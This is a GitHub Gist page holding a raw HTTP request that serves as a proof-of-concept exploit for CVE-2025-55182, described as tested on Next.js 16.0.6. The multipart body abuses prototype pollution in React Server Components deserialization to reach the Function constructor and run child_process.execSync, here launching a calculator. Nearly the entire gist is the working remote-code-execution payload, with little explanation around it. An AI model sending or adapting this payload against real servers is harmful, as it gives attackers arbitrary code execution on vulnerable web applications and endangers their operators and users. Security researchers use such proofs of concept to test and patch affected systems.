Skip to content

Instantly share code, notes, and snippets.

@Malayke
Forked from maple3142/CVE-2025-55182.http
Created December 5, 2025 02:56
Show Gist options
  • Select an option

  • Save Malayke/af6239897c080fbc5e27b653635af98c to your computer and use it in GitHub Desktop.

Select an option

Save Malayke/af6239897c080fbc5e27b653635af98c to your computer and use it in GitHub Desktop.
tested on next.js 16.0.6, might need some changes to be applied to other RSC frameworks
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 565
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment